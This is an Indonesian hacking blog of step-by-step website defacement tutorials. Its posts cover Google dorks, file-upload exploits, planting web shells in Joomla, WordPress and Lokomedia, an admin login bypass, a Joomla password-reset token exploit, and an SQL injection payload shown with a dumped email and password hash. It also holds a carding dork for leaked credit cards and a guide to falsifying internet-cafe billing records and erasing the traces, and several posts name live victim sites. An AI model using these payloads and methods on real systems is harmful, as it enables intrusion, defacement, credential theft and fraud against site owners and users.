1

Exploit Joomla 0day ( COM_EXPOSE )

Kamis, 11 April 2013
Arsyad-Cyber
 
 
#Author: Mauritania Attacker
#Dork: index.php?option=com_expose
#Exploit: administrator/components/com_expose/uploadimg.php 
#Shell: /components/com_expose/expose/img/shell.php 
#Date: 11/05/2012
# www.mauritania-sec.com
 
 Hargai karya orang lain dengan memasang sumber setelah mengcopy   
0

Koleksi Shell

Arsyad-Cyber

Ane kali ini mau men share koleksi shell we ...
Ane dapet dari temen ane dari Indonesia Lostc0de ^_^

Yaudh download aja langsung disini





Download : Disini
 Hargai karya orang lain dengan memasang sumber setelah mengcopy  
1

Deface Site SCH.ID

Arsyad-Cyber
Dork : inurl:/html/index.php +site:sch.id

Exploit : /member/index.php or /member/user.php

User : siswanto
Pass : 123456

Tahap Menanam Shell

SIM -> Data Laporan -> Tambah data laporan -> simpan -> sukses

Tempat shell berada :

site.sch.id/laporan/namashell.php

Thank's : Tintonz-x207 - 207 Cyber Security - Java Defacer Team

Sumber : Tintonz 
0

Israel Akan Dihapus Dari Internet Besok

Sabtu, 06 April 2013

Besok, Israel Dihapus dari Internet!



Seraya menunggu hari peringatan peristiwa Holocaust pada 7 April 2013, Israel pun harus bersiap untuk dihapus dari internet tepat pada tanggal tersebut.

Israel kini tengah menghadapi apa yang telah digambarkan sebagai pertempuran internet terbesar dalam sejarah umat manusia, yang menjanjikan untuk menghapus Israel dari peta internet.

Serangan kini tengah disiapkan para peretas yang berada dalam misi OpIsrael, yang berafiliasi dengan kelompok 'hacktivist' terkemuka, Anonymous.

Pada akhir pekan ini telah direncanakan serangan cyber pada pemerintah, bank, lembaga akademik dan situs bisnis di Israel yang berupa peretasan seperti database yang dihapus dan lainnya sebagai lanjutan dari serangan serupa pada November 2012.

Gelombang kedua dari misi OpIsrael ini telah diprakarsai dari sebulan yang lalu, dengan pernyataan dari kelompok peretas tersebut pada minggu ini untuk pemerintah Israel, seperti diwartakan IBtimes.

"Kalian tidak berhenti melanggar hak manusia yang tak ada habisnya. Kalian tidak berhenti melakukan pemukiman ilegal. Kalian tidak menghormati gencatan senjata. Kalian telah menunjukkan bahwa kalian tidak menghormati hukum internasional".

"Inilah sebabnya pada 7 April, para elite cyber-squadron kami dari seluruh dunia memutuskan untuk bersatu dalam sebuah solidaritas untuk rakyat Palestina terhadap Israel sebagai satu entitas untuk diganggu dan dihapus dari dunia maya."

Namun, Israel disebut tidak asing dengan berbagai serangan cyber seperti ini. November silam Menteri Luar Negeri Israel, Yuval Steinitz mengungkapkan bahwa Israel telah menghadapi 44 juta serangan cyber sejak awal operasi militernya di Gaza.

Selain meningkatkan keamanan pada infrastruktur, Israel Internet Association (ISOC) disebut tengah mempersiapkan untuk menanggapi keluhan dari warga sipilnya terkait serangan tersebut.

Misi OpIsrael ini akan terdiri dari serangkaian serangan cyber yang disebut DDoS (Distributed Denial of Service), dengan menggunakan jaringan komputer yang sangat besar untuk bekerja sama mendorong traffic ke server hosting dari situs yang menjadi target.

Walaupun Israel mengaku siap menghadapi serangan cyber ini yang dipandang tidak cukup 'menakutkan' bagi mereka, namun serangan demi serangan yang dilakukan sebelumnya menunjukkan bahwa kelompok peretas ini memiliki strategi lain selain DDoS.

Kelompok peretas 'hacktivist' yang terkait dengan Anonymous, RedHack dari Turki dan Sector404 dari Arab menyatakan mereka berhasil menjebol pertahanan cyber dari Mossad, dan mencuri data dari 30 ribu agen rahasianya.

Menarik untuk ditunggu apa yang akan terjadi pada Israel di internet pada 7 April 2013. |
3

Tutorial Carding Bagi Pemula

Arsyad-Cyber
Asslamualikum kawan ^_^ Maaf beberapa hari kemaren gk posting :D
Banyak tugas soalnya , jadi gk sempet posting ..
Yaudh , kali ini saya ingin menshare Tutorial Carding Bagi Pemula :D

Kita sekarang mencari nya menggunakan dork
Nih Dork nya

intext:exp: | expirate: creaditcard number: cvv: ext:txt 2015
ScreenShoot nya


Simber : Bandung4rt

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
1

Deface CSRF ( Cross Site Request Forgery )

Rabu, 03 April 2013
Arsyad-Cyber

Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: idca
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :
  • inurl:/wp-content/themes/shepard
  • inurl:/wp-content/themes/money
  • inurl:/wp-content/themes/clockstone
  • inurl:/wp-content/themes/ambleside
  • inurl:/wp-content/themes/pacifico
#Dork dikembangkan sendiri ya :)

4. Untuk coba2 gunakan Live Target & Live Target 2

5. Titip Nama :: Indonesian Cyber Army ( IDCA ) | Stealth Defacer Hacking Team (SDHT)

#Persiapan sudah selesai, sekarang tinggal kita eksekusi :)


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah- Langkah:

1. Masukan Dork ke dalam google (kurang jelas lihat gambar)


2. Pilih salah satu target yang kita dapat tadi (Kurang jelas lihat gambar)


Contoh :
http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadi http://www.robertcarpentry.com/wp-content/themes/pacifico/theme

3. Klik folder "Function" lalu klik file "Upload-bg.php" / "uploadbg.php" / "upload.php"

Note: Jika muncul "You Must Login....."atau blank? cari target lain!! :p  "Jika muncul "error" berarti Web target Vulnerable" ;p

4. Buka file CSRF.html yang tadi sudah di download dengan notepad, ganti URLTARGET  dengan link yang berada di addres bar target kamu tadi. Lihat Gambar! lalu save!
Contoh: "http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"



5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik upload .


Jika berhasil maka akan muncul seperti ini (lihat gambar)


6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini



#itu tandanya shell backdoor kamu sudah terpasang :D sekarang terserah mau kamu apain website itu :)

#Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)

Tampilan madspotshell::

7. Untuk eksekusi Index

Sumber : IDCA

Terima Kasih buat sobat gw dari IDCA Bimo dan ONix Aqua , saya hanya ikut men sharre tutorial yang diberikan dari Grop IDCA ^_^

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan Bypass Admin

Arsyad-Cyber
kali ini ane mau share tentang teknik Bypass Halaman Login Administrator! Bagaimana caranya? Yuk simak aja rame rame,, hehhehe ;)

Bahan Bahan :

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini

Live Target : http://niche-marketplace.net/index_info.php  

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php


Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php 


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p



Duaaarrrrrrrrr!! Udah masuk? Mantap! Trus mo ngapain lagi?? udah gitu aja! wkwkwkwk :p


Trus Tebas index nya gimana gan?? Hajiahhh,, :3 makanya baca tutorial ampe abis dulu, dipahami dan dipelajari baru dipraktekin.. hadeewwhhh!!

Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! Apa itu Shell?? Baca lagi sono di postingan ane Apa itu WebShell :p Disini ane make Madspotshell!

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"



Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

< Line kosong>
< Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
< Line kosong>
< Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Sumber : IDCA

Hargai karya orang lain dengan memasang sumber setelah mengcopy
0

Tutorial Tamper Data

Arsyad-Cyber

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah kalo ntar pas agan mau upload extensi .jpg bagaimana ? yah, harus memakai Teknik Tamper Data ... Yaitu memanfaatkan celah upload image, sedangkan kita menipu admin dengan mengupload file yg extensi nya .php ^_^

Dork : inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"

NB : Anda bias menambahkan site: ^_^



1. Siapakan dulu file shell.php seperti : Shell B374K M1N1


2.  Pilih salah satu shell
3. Rename  extensinya menjadi : shell.php.jpg
4. Install add ons Tamper Data dulu di browser mozilla kita :D
5. Restart dan kita mulai upload 
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

8. Trus Uploads shell.php.jpg kita dan tamper :D


 9. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan hapus bagian .jpg , akan menjadi shell.php .. abis gitu kita klik OK



Letak Shellnya :

http://site.com/wp-content/themes/ ? /images/tmp/[shellmu] -
http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Hack Billing Warnet Tanpa Software

Selasa, 02 April 2013
Arsyad-Cyber
Hacking Billing Warnet Untuk Operator



1. Pertama-tama, close kan billing explorernya. trus dimintai password. isikan password defaultnya 008
2. Kemudian masuk ke tempat dimana folder billing explorer disimpan. Biasanya sih ada di
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
3. Kemudian cari file bill01.008
4. kemudian copy kan file bill01.008 tadi ke My Document aja ya. atau terserah dimana anda mau. INGAT. File bisa di copy kalau billing explorernya sudah kita CLOSE. jadi, lakukan dulu langkah 1. oke?
5. Setelah itu buka lagi aplikasi billing explorernya. Selesai untuk tahap pertama

Kalau ada user yg selesai main, otomatis bertambah lagi kan "REPORT DATABASE B-EXP" nya biarkan saja gan. Misal, user selesai main dan kena Rp.5000
Lanjut, kita CLOSE kan lagi billing explorenya.Lakukan langkah2 diatas yaa

Kalau langkah no.1 udah di selesaikan, sekarang kita masuk ke langkah:
a. Copy file bill01.008 yang ada di My Document tadi. kemudian paste kan ke
D:\Billing Explorer\Explorer Billing\Billing Warnet Explorer
Eits, disitu udah ada namanya, jadi kita rename dulu. trus yg kita copy tadi paste kan ke yang barusan w sebutin
b. kemudian buka lagi aplikasi billing explorernya. Coba lihat, yg Rp.5000 barusan selesai tadi ada gak? ternyata gak ada gan. jadi beres deh kita akali databasenya

Untuk menghilangkan jejak, kita hapus file yang barusan kita rename tadi, trus hapus deh yg di Recycle Bin

Mungkin cara ini bisa digunakan di Billing Billing lain yg menggunakan database. tapi coba aja dulu ya, soalnya ane cuma berhadapan di Billing Explorer

Oh iya, ane emang gunain ini tanpa software karena di warnet w EXE di Block. jadi kagak bisa install software atau apa lah. Dan maaf kagak bisa disertai Screen Shot / gambar / tutorial dalam bentuk video.
Fvck to Teknisi =))


Source: Doza Cracker - Trial error and then do it
www.id-fb.com
Dedicate for: MBT - Cyber X-Plorer - Cyber4rt - Deface Zone
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
 
0

Cara Upload Shell Di CMS Joomla

Arsyad-Cyber

oke teman teman disini saya akan sedikit membahas tentang cara upload shell di joomla


1 halaman admin joomla
[Image: 95145200.jpg]


2. klik installer - template site
[Image: 55797530.jpg]


3. klik browse ... terus tinggal dimasukkan template yang akan di install
[Image: 37135582.jpg]


4.setelah proses install template baru selesai kemudian klik continue
[Image: 72296433.jpg]


5. centang di tempalte baru kita install terus klik edit HTML
[Image: 44600726.jpg]


6. ini gambar scrift default template yang baru diinstall
[Image: 83346777.jpg]


7. setelah terbuka baru kita ganti scrift templatenya dengan scrift shell 
[Image: 41836185.jpg]


8. nah terakhir baru kita lihat linknya dimana shell itu berada
/webdesign/templates/siteground89/index.php
[Image: 16079271.jpg]


9. baru deh kita buka shellnya 
http://www.site.com/webdesign/templates/.../index.php
[Image: 46857503.jpg]


mengapa upload shell di joomla mesti install tempalte baru....tidak menimpah tempalte lama. karena kalau template baru masih bisa Writeable
jadi masih bisa diganti scriftnya.... tapi tergantung juga sih... ada juga template yang udah lama pun kadang2 bisa Writeable
 Sumber : Andi-Tencho
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
 
0

Cara Tanam Shell/Backdoor di CMS Wordpress

Arsyad-Cyber -
sekedar melanjutkan tutor kemarin , mungkin ada yg blm tau cara pasang backdoor pada wordpress...
oke langsung aja ya :)
saya anggap agan udah punya ussername & password target...silahkan login terlebih dahulu ,,
setelah login baru ikuti langkah di bawah....

1.klik editor pada tab appearance ( lihat gambar )


























2. klik 404.php

3 . lalu hapus semua scriptnya dan ganti dengan script shell/backdoor php yg agan punya...
4. klik Update File
5.lihat gambar di bawah " /wp-content/themes/zeepersonal/404.php " pathnya disitu...


























6. kita buka http://harrisondewitt.net/wp-content/themes/zeepersonal/404.php
dan berhasil :D


























biar g curiga, upload lagi backdoornya, dan kembalikan script 404.php nya seperti semula :)
Author : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla Token

 Arsyad-Cyber
######################################################################################### Joomla 1.5.x Remote Admin Password Change ########################################################################################## ## # ### ######################################################################################


File : /components/com_user/controller.php

#####################################################################################Line : 379-399

function confirmreset(){// Check for request forgeriesJRequest::checkToken() or die( 'Invalid Token' );

// Get the input$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}

// Get the model$model = &$this->getModel('Reset');

// Verify the tokenif ($model->confirmReset($token) === false) < --- {2}{$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);return false;}

$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');}

#####################################################################################

File : /components/com_user/models/reset.php

Line: 111-130


function confirmReset($token){global $mainframe;

$db = &JFactory::getDBO();$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}

// Verify the tokenif (!($id = $db->loadResult())){$this->setError(JText::_('INVALID_TOKEN'));return false;}

// Push the token and user id into the session$mainframe->setUserState($this->_namespace.'token', $token);$mainframe->setUserState($this->_namespace.'id', $id);

return true;}#####################################################################################


{1} - Replace ' with empty char{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 ANDactivation = '' "


Contoh :


1. Pergi Ke url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Tuliskan "token" char ' Dan klik OK.

3. Tulis password baru untuk admin

4. Pergi ke halaman admin CMS Joomla : target.com/administrator/

5. Login dengan password yang tadi agan masukan

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit WpStore

Arsyad-Cyber -
- = Newbie Was Here = -
Yang mastah silahkan lewat :D klo mau baca blh
Newbie merapat :D




dork : inurl:/wp-content/themes/
WPstore/
kita dapat meng-upload backdoor
dengan vulnerability ini:
1. WPStore
2. eShop
3. KidzStore
4. Emporium
5. Store
klo udah dpet target, kita tambah /
UPLOAD di target tersebut...
http://www.target.com/wp-
content/themes/Wpstore/upload
selanjutnya akan muncul file
upload,sekarang kita upload shell
kesayangan.... klo udah di upload,
tinggal eksekusi shell kita...
caranya :
http://www.target.com/wp-
content/uploads/products_img/
namashell.php
selesai dehhh..... sekrang terserah
mau di apain tuh sitenya... :D
Author : Arsyad Imam B.
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla

Arsyad-Cyber - Targetnya cari di googlePake Dork ini:

inurl:"option com_artforms"

kita dapat target yaitu :

http://www.avaclean.com/

di exploitnya kodenya di paste ke target tadi ya :D

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

teruscopy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadiyaitu

josh@bkmediagroup.com

setelah di enteranda disuruh masukin code :

kita tinggalin dulu yg inikita cari kode tsb diweb yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita Selamat mencoba :)

Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit Joomla Com_Fabrik

   Oh ya, disini saya jelaskan sedikit ya tentang exploit. Saya sih belum tau arti lengkapnya, tapi secara singkatnya itu exploit dapat diartikan sebagai sebuah kode yang menyerang keamanan

Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.

1. Copas dork ini ke google [dork bisa dikembangkan]


  • inurl:index.php?option=com_fabrik

2. Ceritanya kita sudah mendapat si target

  • http://ar.librodar.com.ar/index.php?option=com_fabrik

3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :

  • index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

4. Maka akan jadi seperti ini

  • http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe

  • php,asp,html,jpg

6. Sudah ? nah sekarang kita akses shellnya di

  • http://localhost.com/media/shell.php

Kalo tipe .php gabisa ya terpaksa dengan tamper data :D 

Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan
Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Deface Dengan RootKit

pertama-tama download dulu programnya di sini
Enaknya Program ini tidak perlu di install hanya tinggal di jalankan saja..

Nah disini saya akan mencoba deface situs http://redevprops.com/index.html yang tampilan


Okeh langsung kita jalankan saja programnya :


1. klik file "Is-rootkit.exe"..






2. klik "WebDav" ==> "asp shell maker"..



3. klik “Setting”.
*Lalu hapus “name of your shell”, ganti shell dengan sesuka anda..
Kalo tidak ganti dengan index.html saja..

*Hapus juga semua “write your shell here”, lalu masukan file yg berformat “.html” anda dengan mengklik “Load file”..

NB : Jika Tidak Punya Script Deface Bisa Menggunakan Script Saya Tinggal Anda Eddit" Aja DI Notepad :DD!!
Download Aja ==> DISINI <==

4. langkah selanjutnya adalah klik “Add site” lalu masukan alamat situs target..



5. dan yang terakhir tinggal klik “serang !!!” deh..
Tunggu beberapa saat, jika web tersebut vulnaribel maka akan keluar sperti ini..




Lalu copy shell yang sudah ter buat tadi..



Lalu kita lihat hasilnya, pastekan shell yang tadi kita copy di tempat kita masukan alamat..
Maka hasilnya sperti ini :


Halaman asli dari situs tersebut telah kita deface..hehehe
Sumber : Disini 
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Bug CMS Lokomedia After Patch

Bugs Template CMS Lokomedia After Patch

Arsyad-Cyber - Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tindakan yang dinamakan Patch. Jika hal tersebut terjadi hal seperti Deface Lokomedia sudah tidak berfungsi lagi, tapi jangan khawatir karena saya mempunyai bugs lain dalam deface Lokomedia.

Dork : allinurl:media.php?module=berita
Pilih suatu web yang menurut anda bisa di deface dengan lokomedia , ingat !!! tutorial selanjutnya itu sama dengan artikel Deface Dengan Lokomedia tetapi masalahnya ketika anda pasang banner tempat upload nya tidak ada karena sudah di patch.

http://www.target.com/admin/content.php?module=banner
Langsung ganti url web target nya menjadi sperti berikut :

http://www.target.com/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :

./aksi.php?module=banner&act=input
Kemudian ganti dengan

http://www.target.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki. Selanjutnya tinggal lihat hasil nya di :

http://www.target.com/admin/foto_berita/shell.php
Setelah itu terserah kreasi anda sendiri yang mempunyai backdoor menjadi hak utuh milik anda , kami hanya share ilmu yang kami tahu dan tidak untuk membahayakan dan merugikan pihak lain bahkan resiko anda sendiri yang menanggungnya. Dan Untuk admin website Lokomedia saya harapkan untuk menutup bugs tersebut agar website anda aman dari serangan defacer yang banyak di dunia maya ini. Semoga Bermanfaat untuk anda semua.

Happy To Hacker And Defacer , Its All About Your'e Brian !!!

Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Exploit CMS Balitbang

Arsyad-Cyber - Exploit CMS Balitbang

Hai kawan, Kali Blog saya akan men share exploit cms balitbang .. mungkin ini exploit lama , tapi mungkin bisa berguna bagi newbie yang ingin belajar deface :D
CMS Balitbang 3.42
Dork : inurl:"/html/siswa.php?" inurl:"/html/alumni.php?" inurl:"/html/guru.php?"
Exploite : [url]http://public_html/dir/editor/filemanager/connectors/test.html[/url]

1. kita masukin dork untuk mencari bug pada CMS Balitbang 3.42

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG1.jpg[/IMG]

2. kemudian kita memilih salah satu dari hasil pencarian dengan memakai dork tersebut

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG2.jpg[/IMG]

itu adalah tampilan asli dari web yang akan kita deface

3. setelah itu kita masukin exploit untuk CMS Balitbang 3.42 pada address barnya

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG3.jpg[/IMG]

maka secara automatis tampilan akan berubah seperti gambar di atas

4. rubah menu ASP menjadi PHP dan selanjutnya kita search file yang akan kita sisipkan ke dalam web tersebut

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG4.jpg[/IMG]

catatan: file yang bisa disisipkan hanya file yang berextensi *.txt

5. jika file sukses sukses terupload maka akan seperti dibawah ini

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG5.jpg[/IMG]

6. setelah itu kita tinggal search file yang disisipkan kedalam web tersebut

[IMG]http://i842.photobucket.com/albums/zz349/dzhenway/BALITBANG6.jpg[/IMG]

catatan: file akan berada disini ([url]http://www.xxx.com/home/userfiles/file/Nama_File.txt[/url])

jjjrreeenngggg web tersebut telah anda deface

gampangkan caranya

mungkin sekian dulu tutorial cupu dari ane, sekalian lw da yang bisa edit sedikit biar bisa upload shell.php :guling:

mohon maaf bila kebanyakan web hasil search adalah web-web sekolah di Indonesia
Sumber : Disini
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Cara Mencari Config Bekas

Arsyad-Cyber - Mencari Config Bekas
 Asslamualikum kawan ^_^, Kali ini saya bakal memberi kalian tutor Mencari Config Bekas "
Mungkin bagi yang newbie seperti saya cocok nih, bagi yang bisa memasang config diwebsite, nihh langsung ane kasih tau Cara Mencari Config Bekas ^_^
berburu config gih disini yah :dork : Wordpress.txt intitle:Index Of
ga usah pake demo yah :)tinggal kalian cari aja disitu sql.php, Mysql.php or database.php buat login nya..
yah kalo ga ada cari target lain :D haha

oh iyah, Wordpress.txt
bisa di ganti juga joomla.txt or whmcs.txt

selamat mencoba ^_^
maaf masih newbie dera mah :)
cun dulu dong.. :vwkwkwkwkwkw
NB : Kalian bisa menambahkan intext: / site:

Sekian Dari saya kawan , wassalamualikum wr.wb ^_^
Author : Dera Kyubi ThecyberBoys  
Hargai karya orang lain dengan memasang sumber setelah mengcopy  
0

Tutorial Deface Dengan Reserve IP

Senin, 01 April 2013
Arsyad-Cyber - Metode Men-Hack Website dengan Reverse Ip.

Cara Hack Target Dengan Metode Reverse Ip membutuhkan sedikit waktu.
Pertama anda perlu target, misalkan http://herchcovitch.uol.com.br/. Maka untuk men-reverse Ip anda sekarang perlu ping target Anda seperti ini >> Buka CMD => http://herchcovitch.uol.com.br/


Versi 1. : Menggunakan CMD 

1.Pertama Anda Harus Mencari Suatu Website Di Google.co.id atau bing.com Liat contohnnya

2. Setelah kita dapat target  POC: http://herchcovitch.uol.com.br langsung kita Ping mengunakan CMD
 Quote:Pinging http://herchcovitch.uol.com.br/ [200.147.0.120] with 32 bytes of data:
dan ambil IP nya 200.147.0.120

3. Kemudian buka bing.com paste kode di bawah ini: Dan tulis dorknnya ip:200.147.0.120 php?id=




Versi 2  : Menggunakan http://www.yougetsignal.com/tools/web-sites-on-web-server/ 

1 .atau ambil IP nya paste ke link di bawah untuk melihat web yg satu server:




2.  Hasilnnya adalah 200.147.0.120 IP Dari Website http://herchcovitch.uol.com.br/

3. Setelah Itu Kita Buka DISINI Dan Search Menggunakan Dork ip:200.147.0.120 php?id=

 4. Disini Saya Memilih Website http://casadachris.uol.com.br/faca_materia.php?id=36  Sebagai Contoh

5. Selesai ^_^ Setelah Kita Dapat Websitennya Kita Inject Menggunakan SQLI,SQLMAP,Havj,Bactrack5 DLL


disana nanti akan terlihat website yang banyak dalam satu host/server dengan IP/WEbsite di atas.
Sekarang periksa semua situs satu per satu untuk menginjeksi sql injection.
Jika Anda mendapat rentan terhadap sql injection di website tsb, langsung saja mengupload shell, dan lakukan symlink senang